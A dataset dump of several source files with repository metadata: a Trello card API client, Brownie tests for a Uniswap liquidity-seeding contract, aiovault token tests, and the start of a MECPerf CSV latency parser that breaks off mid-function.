hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
55e916faaa5c6e83aba5d5dcdbb7e7227823c94e | 164 | py | Python | vofotensors/__init__.py | JulianKarlBauer/fiber_orientation_tensors_2021 | d42bafd17c2f1a18b9a3f45952c6f76643b4b86f | [
"MIT"
] | null | null | null | vofotensors/__init__.py | JulianKarlBauer/fiber_orientation_tensors_2021 | d42bafd17c2f1a18b9a3f45952c6f76643b4b86f | [
"MIT"
] | 1 | 2021-12-20T21:19:43.000Z | 2021-12-20T21:19:43.000Z | vofotensors/__init__.py | JulianKarlBauer/fiber_orientation_tensors_2021 | d42bafd17c2f1a18b9a3f45952c6f76643b4b86f | [
"MIT"
] | null | null | null | from . import abc
from . import numbers
from . import notation
from . import utils
from . import deviators_2
from . import deviators_4
from . import fabric_tensors
| 20.5 | 28 | 0.786585 | 24 | 164 | 5.25 | 0.458333 | 0.555556 | 0.301587 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014706 | 0.170732 | 164 | 7 | 29 | 23.428571 | 0.911765 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
3667362972baf8194180bff19804abbaff6ebe14 | 13,313 | py | Python | trello/cards.py | dellelce/trellopy | c64885e4b6ae6fd3f6a22a512ffbce033215fc19 | [
"BSD-2-Clause"
] | null | null | null | trello/cards.py | dellelce/trellopy | c64885e4b6ae6fd3f6a22a512ffbce033215fc19 | [
"BSD-2-Clause"
] | null | null | null | trello/cards.py | dellelce/trellopy | c64885e4b6ae6fd3f6a22a512ffbce033215fc19 | [
"BSD-2-Clause"
] | null | null | null | import json
import requests
class Cards(object):
__module__ = 'trello'
def __init__(self, apikey, token=None):
self._apikey = apikey
self._token = token
def get(self, card_id_or_shortlink, actions=None, actions_limit=None, action_fields=None, attachments=None, attachment_fields=None, members=None, member_fields=None, checkItemStates=None, checkItemState_fields=None, checklists=None, checklist_fields=None, board=None, board_fields=None, list=None, list_fields=None, fields=None):
resp = requests.get("https://trello.com/1/cards/%s" % (card_id_or_shortlink), params=dict(key=self._apikey, token=self._token, actions=actions, actions_limit=actions_limit, action_fields=action_fields, attachments=attachments, attachment_fields=attachment_fields, members=members, member_fields=member_fields, checkItemStates=checkItemStates, checkItemState_fields=checkItemState_fields, checklists=checklists, checklist_fields=checklist_fields, board=board, board_fields=board_fields, list=list, list_fields=list_fields, fields=fields), data=None)
resp.raise_for_status()
return json.loads(resp.content)
def get_field(self, field, card_id_or_shortlink):
resp = requests.get("https://trello.com/1/cards/%s/%s" % (card_id_or_shortlink, field), params=dict(key=self._apikey, token=self._token), data=None)
resp.raise_for_status()
return json.loads(resp.content)
def get_action(self, card_id_or_shortlink, filter=None, fields=None, limit=None, format=None, since=None, page=None, idModels=None):
resp = requests.get("https://trello.com/1/cards/%s/actions" % (card_id_or_shortlink), params=dict(key=self._apikey, token=self._token, filter=filter, fields=fields, limit=limit, format=format, since=since, page=page, idModels=idModels), data=None)
resp.raise_for_status()
return json.loads(resp.content)
def get_attachment(self, card_id_or_shortlink, fields=None):
resp = requests.get("https://trello.com/1/cards/%s/attachments" % (card_id_or_shortlink), params=dict(key=self._apikey, token=self._token, fields=fields), data=None)
resp.raise_for_status()
return json.loads(resp.content)
def get_board(self, card_id_or_shortlink, fields=None):
resp = requests.get("https://trello.com/1/cards/%s/board" % (card_id_or_shortlink), params=dict(key=self._apikey, token=self._token, fields=fields), data=None)
resp.raise_for_status()
return json.loads(resp.content)
def get_board_field(self, field, card_id_or_shortlink):
resp = requests.get("https://trello.com/1/cards/%s/board/%s" % (card_id_or_shortlink, field), params=dict(key=self._apikey, token=self._token), data=None)
resp.raise_for_status()
return json.loads(resp.content)
def get_checkItemState(self, card_id_or_shortlink, fields=None):
resp = requests.get("https://trello.com/1/cards/%s/checkItemStates" % (card_id_or_shortlink), params=dict(key=self._apikey, token=self._token, fields=fields), data=None)
resp.raise_for_status()
return json.loads(resp.content)
def get_checklist(self, card_id_or_shortlink, cards=None, card_fields=None, checkItems=None, checkItem_fields=None, filter=None, fields=None):
resp = requests.get("https://trello.com/1/cards/%s/checklists" % (card_id_or_shortlink), params=dict(key=self._apikey, token=self._token, cards=cards, card_fields=card_fields, checkItems=checkItems, checkItem_fields=checkItem_fields, filter=filter, fields=fields), data=None)
resp.raise_for_status()
return json.loads(resp.content)
def get_list(self, card_id_or_shortlink, fields=None):
resp = requests.get("https://trello.com/1/cards/%s/list" % (card_id_or_shortlink), params=dict(key=self._apikey, token=self._token, fields=fields), data=None)
resp.raise_for_status()
return json.loads(resp.content)
def get_list_field(self, field, card_id_or_shortlink):
resp = requests.get("https://trello.com/1/cards/%s/list/%s" % (card_id_or_shortlink, field), params=dict(key=self._apikey, token=self._token), data=None)
resp.raise_for_status()
return json.loads(resp.content)
def get_member(self, card_id_or_shortlink, fields=None):
resp = requests.get("https://trello.com/1/cards/%s/members" % (card_id_or_shortlink), params=dict(key=self._apikey, token=self._token, fields=fields), data=None)
resp.raise_for_status()
return json.loads(resp.content)
def get_membersVoted(self, card_id_or_shortlink, fields=None):
resp = requests.get("https://trello.com/1/cards/%s/membersVoted" % (card_id_or_shortlink), params=dict(key=self._apikey, token=self._token, fields=fields), data=None)
resp.raise_for_status()
return json.loads(resp.content)
def update(self, card_id_or_shortlink, name=None, desc=None, closed=None, idAttachmentCover=None, idList=None, pos=None, due=None, subscribed=None):
resp = requests.put("https://trello.com/1/cards/%s" % (card_id_or_shortlink), params=dict(key=self._apikey, token=self._token), data=dict(name=name, desc=desc, closed=closed, idAttachmentCover=idAttachmentCover, idList=idList, pos=pos, due=due, subscribed=subscribed))
resp.raise_for_status()
return json.loads(resp.content)
def update_checklist_checkItem_name_idCheckList_idCheckItem(self, idCheckList, idCheckItem, card_id_or_shortlink, value):
resp = requests.put("https://trello.com/1/cards/%s/checklist/%s/checkItem/%s/name" % (card_id_or_shortlink, idCheckList, idCheckItem), params=dict(key=self._apikey, token=self._token), data=dict(value=value))
resp.raise_for_status()
return json.loads(resp.content)
def update_checklist_checkItem_po_idCheckList_idCheckItem(self, idCheckList, idCheckItem, card_id_or_shortlink, value):
resp = requests.put("https://trello.com/1/cards/%s/checklist/%s/checkItem/%s/pos" % (card_id_or_shortlink, idCheckList, idCheckItem), params=dict(key=self._apikey, token=self._token), data=dict(value=value))
resp.raise_for_status()
return json.loads(resp.content)
def update_checklist_checkItem_state_idCheckList_idCheckItem(self, idCheckList, idCheckItem, card_id_or_shortlink, value):
resp = requests.put("https://trello.com/1/cards/%s/checklist/%s/checkItem/%s/state" % (card_id_or_shortlink, idCheckList, idCheckItem), params=dict(key=self._apikey, token=self._token), data=dict(value=value))
resp.raise_for_status()
return json.loads(resp.content)
def update_closed(self, card_id_or_shortlink, value):
resp = requests.put("https://trello.com/1/cards/%s/closed" % (card_id_or_shortlink), params=dict(key=self._apikey, token=self._token), data=dict(value=value))
resp.raise_for_status()
return json.loads(resp.content)
def update_desc(self, card_id_or_shortlink, value):
resp = requests.put("https://trello.com/1/cards/%s/desc" % (card_id_or_shortlink), params=dict(key=self._apikey, token=self._token), data=dict(value=value))
resp.raise_for_status()
return json.loads(resp.content)
def update_due(self, card_id_or_shortlink, value):
resp = requests.put("https://trello.com/1/cards/%s/due" % (card_id_or_shortlink), params=dict(key=self._apikey, token=self._token), data=dict(value=value))
resp.raise_for_status()
return json.loads(resp.content)
def update_idAttachmentCover(self, card_id_or_shortlink, value):
resp = requests.put("https://trello.com/1/cards/%s/idAttachmentCover" % (card_id_or_shortlink), params=dict(key=self._apikey, token=self._token), data=dict(value=value))
resp.raise_for_status()
return json.loads(resp.content)
def update_idList(self, card_id_or_shortlink, value):
resp = requests.put("https://trello.com/1/cards/%s/idList" % (card_id_or_shortlink), params=dict(key=self._apikey, token=self._token), data=dict(value=value))
resp.raise_for_status()
return json.loads(resp.content)
def update_name(self, card_id_or_shortlink, value):
resp = requests.put("https://trello.com/1/cards/%s/name" % (card_id_or_shortlink), params=dict(key=self._apikey, token=self._token), data=dict(value=value))
resp.raise_for_status()
return json.loads(resp.content)
def update_po(self, card_id_or_shortlink, value):
resp = requests.put("https://trello.com/1/cards/%s/pos" % (card_id_or_shortlink), params=dict(key=self._apikey, token=self._token), data=dict(value=value))
resp.raise_for_status()
return json.loads(resp.content)
def update_subscribed(self, card_id_or_shortlink, value):
resp = requests.put("https://trello.com/1/cards/%s/subscribed" % (card_id_or_shortlink), params=dict(key=self._apikey, token=self._token), data=dict(value=value))
resp.raise_for_status()
return json.loads(resp.content)
def new(self, name, idList, desc=None, pos=None, idCardSource=None, keepFromSource=None):
resp = requests.post("https://trello.com/1/cards" % (), params=dict(key=self._apikey, token=self._token), data=dict(name=name, idList=idList, desc=desc, pos=pos, idCardSource=idCardSource, keepFromSource=keepFromSource))
resp.raise_for_status()
return json.loads(resp.content)
def new_action_comment(self, card_id_or_shortlink, text):
resp = requests.post("https://trello.com/1/cards/%s/actions/comments" % (card_id_or_shortlink), params=dict(key=self._apikey, token=self._token), data=dict(text=text))
resp.raise_for_status()
return json.loads(resp.content)
def new_attachment(self, card_id_or_shortlink, file=None, url=None, name=None):
resp = requests.post("https://trello.com/1/cards/%s/attachments" % (card_id_or_shortlink), params=dict(key=self._apikey, token=self._token), data=dict(file=file, url=url, name=name))
resp.raise_for_status()
return json.loads(resp.content)
def new_checklist(self, card_id_or_shortlink, value):
resp = requests.post("https://trello.com/1/cards/%s/checklists" % (card_id_or_shortlink), params=dict(key=self._apikey, token=self._token), data=dict(value=value))
resp.raise_for_status()
return json.loads(resp.content)
def new_label(self, card_id_or_shortlink, value):
resp = requests.post("https://trello.com/1/cards/%s/labels" % (card_id_or_shortlink), params=dict(key=self._apikey, token=self._token), data=dict(value=value))
resp.raise_for_status()
return json.loads(resp.content)
def new_member(self, card_id_or_shortlink, value):
resp = requests.post("https://trello.com/1/cards/%s/members" % (card_id_or_shortlink), params=dict(key=self._apikey, token=self._token), data=dict(value=value))
resp.raise_for_status()
return json.loads(resp.content)
def new_membersVoted(self, card_id_or_shortlink, value):
resp = requests.post("https://trello.com/1/cards/%s/membersVoted" % (card_id_or_shortlink), params=dict(key=self._apikey, token=self._token), data=dict(value=value))
resp.raise_for_status()
return json.loads(resp.content)
def delete(self, card_id_or_shortlink):
resp = requests.delete("https://trello.com/1/cards/%s" % (card_id_or_shortlink), params=dict(key=self._apikey, token=self._token), data=None)
resp.raise_for_status()
return json.loads(resp.content)
def delete_attachment_idAttachment(self, idAttachment, card_id_or_shortlink):
resp = requests.delete("https://trello.com/1/cards/%s/attachments/%s" % (card_id_or_shortlink, idAttachment), params=dict(key=self._apikey, token=self._token), data=None)
resp.raise_for_status()
return json.loads(resp.content)
def delete_checklist_idChecklist(self, idChecklist, card_id_or_shortlink):
resp = requests.delete("https://trello.com/1/cards/%s/checklists/%s" % (card_id_or_shortlink, idChecklist), params=dict(key=self._apikey, token=self._token), data=None)
resp.raise_for_status()
return json.loads(resp.content)
def delete_label_color(self, color, card_id_or_shortlink):
resp = requests.delete("https://trello.com/1/cards/%s/labels/%s" % (card_id_or_shortlink, color), params=dict(key=self._apikey, token=self._token), data=None)
resp.raise_for_status()
return json.loads(resp.content)
def delete_member_idMember(self, idMember, card_id_or_shortlink):
resp = requests.delete("https://trello.com/1/cards/%s/members/%s" % (card_id_or_shortlink, idMember), params=dict(key=self._apikey, token=self._token), data=None)
resp.raise_for_status()
return json.loads(resp.content)
def delete_membersVoted_idMember(self, idMember, card_id_or_shortlink):
resp = requests.delete("https://trello.com/1/cards/%s/membersVoted/%s" % (card_id_or_shortlink, idMember), params=dict(key=self._apikey, token=self._token), data=None)
resp.raise_for_status()
return json.loads(resp.content)
| 67.57868 | 557 | 0.714114 | 1,873 | 13,313 | 4.831821 | 0.04645 | 0.047735 | 0.063646 | 0.135249 | 0.818343 | 0.801436 | 0.787072 | 0.779779 | 0.779779 | 0.767403 | 0 | 0.003265 | 0.148877 | 13,313 | 196 | 558 | 67.923469 | 0.795428 | 0 | 0 | 0.477419 | 0 | 0.019355 | 0.111535 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.245161 | false | 0 | 0.012903 | 0 | 0.509677 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
367c6b20aad2d9ac2695ce45c9a2b17b46991c8d | 6,188 | py | Python | tests/test_provide.py | 1Blackdiamondsc/seed-liquidity | 91e08c1a0bfa8115db38a23d236c22dcddf039af | [
"MIT"
] | 55 | 2020-12-18T15:34:11.000Z | 2022-03-27T12:50:09.000Z | tests/test_provide.py | 1Blackdiamondsc/seed-liquidity | 91e08c1a0bfa8115db38a23d236c22dcddf039af | [
"MIT"
] | null | null | null | tests/test_provide.py | 1Blackdiamondsc/seed-liquidity | 91e08c1a0bfa8115db38a23d236c22dcddf039af | [
"MIT"
] | 17 | 2020-12-18T14:36:32.000Z | 2022-02-10T17:41:12.000Z | import pytest
import brownie
@pytest.fixture
def seed(SeedLiquidity, uniswap, lido, weth, accounts):
return SeedLiquidity.deploy(
uniswap,
[lido, weth],
["10 ether", "10 ether"],
14 * 86400,
0,
{"from": accounts[0]},
)
def test_both_unfilled(seed, lido, weth, agent, whale, interface):
pair = interface.ERC20(seed.pair())
lido_amount = "9 ether"
weth_amount = "9 ether"
lido.approve(seed, lido_amount, {'from': agent})
seed.deposit(
[lido_amount, 0],
{'from': agent},
)
weth.approve(seed, weth_amount, {'from': whale})
seed.deposit(
[0, weth_amount],
{'from': whale},
)
assert lido.balanceOf(seed) == lido_amount
assert seed.balances(agent, 0) == lido_amount
assert seed.totals(0) == lido_amount
assert weth.balanceOf(seed) == weth_amount
assert seed.balances(whale, 1) == weth_amount
assert seed.totals(1) == weth_amount
with brownie.reverts():
seed.provide()
assert seed.liquidity() == 0
assert pair.balanceOf(seed) == 0
assert pair.totalSupply() == 0
def test_lido_unfilled(seed, lido, weth, agent, whale, interface):
pair = interface.ERC20(seed.pair())
lido_amount = "9 ether"
weth_amount = "10 ether"
lido.approve(seed, lido_amount, {'from': agent})
seed.deposit(
[lido_amount, 0],
{'from': agent},
)
weth.approve(seed, weth_amount, {'from': whale})
seed.deposit(
[0, weth_amount],
{'from': whale},
)
assert lido.balanceOf(seed) == lido_amount
assert seed.balances(agent, 0) == lido_amount
assert seed.totals(0) == lido_amount
assert weth.balanceOf(seed) == weth_amount
assert seed.balances(whale, 1) == weth_amount
assert seed.totals(1) == weth_amount
with brownie.reverts():
seed.provide()
assert seed.liquidity() == 0
assert pair.balanceOf(seed) == 0
assert pair.totalSupply() == 0
def test_weth_unfilled(seed, lido, weth, agent, whale, interface):
pair = interface.ERC20(seed.pair())
lido_amount = "10 ether"
weth_amount = "9 ether"
lido.approve(seed, lido_amount, {'from': agent})
seed.deposit(
[lido_amount, 0],
{'from': agent},
)
weth.approve(seed, weth_amount, {'from': whale})
seed.deposit(
[0, weth_amount],
{'from': whale},
)
assert lido.balanceOf(seed) == lido_amount
assert seed.balances(agent, 0) == lido_amount
assert seed.totals(0) == lido_amount
assert weth.balanceOf(seed) == weth_amount
assert seed.balances(whale, 1) == weth_amount
assert seed.totals(1) == weth_amount
with brownie.reverts():
seed.provide()
assert seed.liquidity() == 0
assert pair.balanceOf(seed) == 0
assert pair.totalSupply() == 0
def test_filled(seed, lido, weth, agent, whale, interface):
pair = interface.ERC20(seed.pair())
lido_amount = "10 ether"
weth_amount = "10 ether"
lido.approve(seed, lido_amount, {'from': agent})
seed.deposit(
[lido_amount, 0],
{'from': agent},
)
weth.approve(seed, weth_amount, {'from': whale})
seed.deposit(
[0, weth_amount],
{'from': whale},
)
assert lido.balanceOf(seed) == lido_amount
assert seed.balances(agent, 0) == lido_amount
assert seed.totals(0) == lido_amount
assert weth.balanceOf(seed) == weth_amount
assert seed.balances(whale, 1) == weth_amount
assert seed.totals(1) == weth_amount
seed.provide()
assert seed.liquidity() > 0
assert pair.balanceOf(seed) == seed.liquidity()
assert pair.balanceOf(seed) == pair.totalSupply() - 1000 # 1000 LP tokens burned
# Check revert on second time
with brownie.reverts():
seed.provide()
def test_existing(seed, lido, weth, agent, whale, interface, uniswap, chain):
pair = interface.ERC20(seed.pair())
# Prefund pool
lido_amount = "1 ether"
weth_amount = "1 ether"
lido.transfer(whale, lido_amount, {'from': agent})
lido.approve(uniswap, lido_amount, {'from': whale})
weth.approve(uniswap, weth_amount, {'from': whale})
uniswap.addLiquidity(
lido,
weth,
lido_amount,
weth_amount,
lido_amount,
weth_amount,
whale,
chain.time(),
{'from': whale},
)
assert seed.liquidity() == 0
assert pair.balanceOf(seed) == 0
assert pair.balanceOf(whale) > 0
assert pair.totalSupply() > 0
# Try to seed
lido_amount = "10 ether"
weth_amount = "10 ether"
lido.approve(seed, lido_amount, {'from': agent})
seed.deposit(
[lido_amount, 0],
{'from': agent},
)
weth.approve(seed, weth_amount, {'from': whale})
seed.deposit(
[0, weth_amount],
{'from': whale},
)
assert lido.balanceOf(seed) == lido_amount
assert seed.balances(agent, 0) == lido_amount
assert seed.totals(0) == lido_amount
assert weth.balanceOf(seed) == weth_amount
assert seed.balances(whale, 1) == weth_amount
assert seed.totals(1) == weth_amount
with brownie.reverts():
seed.provide()
assert seed.liquidity() == 0
assert pair.balanceOf(seed) == 0
assert pair.totalSupply() > 0
def test_expired(seed, lido, weth, agent, whale, interface, chain):
pair = interface.ERC20(seed.pair())
lido_amount = "10 ether"
weth_amount = "10 ether"
lido.approve(seed, lido_amount, {'from': agent})
seed.deposit(
[lido_amount, 0],
{'from': agent},
)
weth.approve(seed, weth_amount, {'from': whale})
seed.deposit(
[0, weth_amount],
{'from': whale},
)
assert lido.balanceOf(seed) == lido_amount
assert seed.balances(agent, 0) == lido_amount
assert seed.totals(0) == lido_amount
assert weth.balanceOf(seed) == weth_amount
assert seed.balances(whale, 1) == weth_amount
assert seed.totals(1) == weth_amount
chain.sleep(14 * 86400)
with brownie.reverts():
seed.provide()
assert seed.liquidity() == 0
assert pair.balanceOf(seed) == 0
assert pair.totalSupply() == 0
| 26.904348 | 85 | 0.618293 | 759 | 6,188 | 4.922266 | 0.080369 | 0.109743 | 0.102784 | 0.066113 | 0.842345 | 0.828426 | 0.802195 | 0.802195 | 0.802195 | 0.802195 | 0 | 0.025208 | 0.243536 | 6,188 | 229 | 86 | 27.021834 | 0.772912 | 0.011959 | 0 | 0.75 | 0 | 0 | 0.038959 | 0 | 0 | 0 | 0 | 0 | 0.315217 | 1 | 0.038043 | false | 0 | 0.01087 | 0.005435 | 0.054348 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
36aeb6ba65be0d02554546aed978bd47e0e3c4f5 | 2,485 | py | Python | tests/test_token.py | johnnoone/aiovault | 03e1bfb6f0404dcf97ce87a98c539027c4e78a37 | [
"BSD-3-Clause"
] | 1 | 2022-01-31T22:37:57.000Z | 2022-01-31T22:37:57.000Z | tests/test_token.py | johnnoone/aiovault | 03e1bfb6f0404dcf97ce87a98c539027c4e78a37 | [
"BSD-3-Clause"
] | null | null | null | tests/test_token.py | johnnoone/aiovault | 03e1bfb6f0404dcf97ce87a98c539027c4e78a37 | [
"BSD-3-Clause"
] | null | null | null | from aiovault import Vault
from conftest import async_test
import pytest
@async_test
def test_lookup_1(dev_server):
client = Vault(dev_server.addr, token=dev_server.root_token)
token = yield from client.auth.lookup_self()
assert token.id == dev_server.root_token
@async_test
def test_lookup_2(dev_server):
client = Vault(dev_server.addr, token=dev_server.root_token)
token = yield from client.auth.lookup(dev_server.root_token)
assert token.id == dev_server.root_token
@async_test
def test_lookup_3(dev_server):
client = Vault(dev_server.addr, token=dev_server.root_token)
token1 = yield from client.auth.create()
token2 = yield from client.auth.lookup(token1.id)
assert token2.id == token1.id
@async_test
def test_renew(dev_server):
client = Vault(dev_server.addr, token=dev_server.root_token)
token = yield from client.auth.create(lease='1h')
token = yield from client.auth.renew(token)
@async_test
def test_revoke_prefix(dev_server):
client = Vault(dev_server.addr, token=dev_server.root_token)
token = yield from client.auth.create()
yield from client.auth.lookup(token)
revoked = yield from client.auth.revoke_prefix('auth/token/')
assert revoked is True
with pytest.raises(KeyError):
yield from client.auth.lookup(token)
@async_test
def test_revoke_cascade(dev_server):
client = Vault(dev_server.addr, token=dev_server.root_token)
parent_token = yield from client.auth.create()
client_b = Vault(dev_server.addr, token=parent_token)
child_token = yield from client_b.auth.create()
yield from client.auth.lookup(parent_token)
yield from client.auth.lookup(child_token)
yield from client.auth.revoke(parent_token)
with pytest.raises(KeyError):
yield from client.auth.lookup(parent_token)
with pytest.raises(KeyError):
yield from client.auth.lookup(child_token)
@async_test
def test_revoke_orphan(dev_server):
client = Vault(dev_server.addr, token=dev_server.root_token)
parent_token = yield from client.auth.create()
client_b = Vault(dev_server.addr, token=parent_token)
child_token = yield from client_b.auth.create()
yield from client.auth.lookup(parent_token)
yield from client.auth.lookup(child_token)
yield from client.auth.revoke_orphan(parent_token)
with pytest.raises(KeyError):
yield from client.auth.lookup(parent_token)
yield from client.auth.lookup(child_token)
| 28.563218 | 65 | 0.746881 | 367 | 2,485 | 4.839237 | 0.117166 | 0.131757 | 0.202703 | 0.23536 | 0.871622 | 0.803491 | 0.757883 | 0.738176 | 0.738176 | 0.710586 | 0 | 0.004306 | 0.158954 | 2,485 | 86 | 66 | 28.895349 | 0.845455 | 0 | 0 | 0.62069 | 0 | 0 | 0.005231 | 0 | 0 | 0 | 0 | 0 | 0.068966 | 1 | 0.12069 | false | 0 | 0.051724 | 0 | 0.172414 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
36b182eb7702349ceb966260961a193c8b6b73a9 | 73,910 | py | Python | parseresults/readcsv.py | MECPerf/MECPerf | d34f5cc981c9d5fc5482ff81eea04412ad946829 | [
"BSD-3-Clause"
] | 1 | 2021-01-16T02:02:17.000Z | 2021-01-16T02:02:17.000Z | parseresults/readcsv.py | MECPerf/MECPerf | d34f5cc981c9d5fc5482ff81eea04412ad946829 | [
"BSD-3-Clause"
] | null | null | null | parseresults/readcsv.py | MECPerf/MECPerf | d34f5cc981c9d5fc5482ff81eea04412ad946829 | [
"BSD-3-Clause"
] | 1 | 2019-12-16T12:47:07.000Z | 2019-12-16T12:47:07.000Z | import csv
import sys
import logging
import datetime
from collections import OrderedDict
_MINROWNUMBER = 50
def _get_subnetaddresses(config_parser, section, conntype, logger):
if conntype == "wifi":
client_subnetaddr = config_parser.get(section, "client_subnetaddr_wifi")
edgeserver_subnetaddr = config_parser.get(section, "edgeserver_subnetaddr_wifi")
cloudserver_subnetaddr = config_parser.get(section, "remoteserver_subnetaddr_wifi")
elif conntype == "lte":
client_subnetaddr = config_parser.get(section, "client_subnetaddr_lte")
edgeserver_subnetaddr = config_parser.get(section, "edgeserver_subnetaddr_lte")
cloudserver_subnetaddr = config_parser.get(section, "remoteserver_subnetaddr_lte")
else:
print ("unknown connection type")
logger.critical("unknown connection type " + str(conntype))
logger.critical("EXIT")
sys.exit(0)
return client_subnetaddr, edgeserver_subnetaddr, cloudserver_subnetaddr
def readvalues_activelatencyboxplot(inputfile, noise, segment):
ret = []
with open (inputfile, "r") as csvinput:
csvreader = csv.reader(csvinput, delimiter=",")
linecount = 0
for row in csvreader:
if linecount == 0 or linecount == 1:
linecount += 1
continue
if linecount == 2:
try:
assert row[12] == "latency"
assert row[9] == "Keyword"
assert row[6] == "ReceiverIdentity"
assert row[5] == "SenderIdentity"
assert row[4] == "Command"
assert row[3] == "Direction"
except Exception as e:
print (e)
print (row)
sys.exit(1)
linecount += 1
#print row
continue
linecount += 1
command = row[4]
senderIdentity = row[5]
receiverIdentity = row[6]
latency = float(row[12])
direction = row[3]
keyword = row[9]
assert command == "TCPRTT" or command == "UDPRTT"
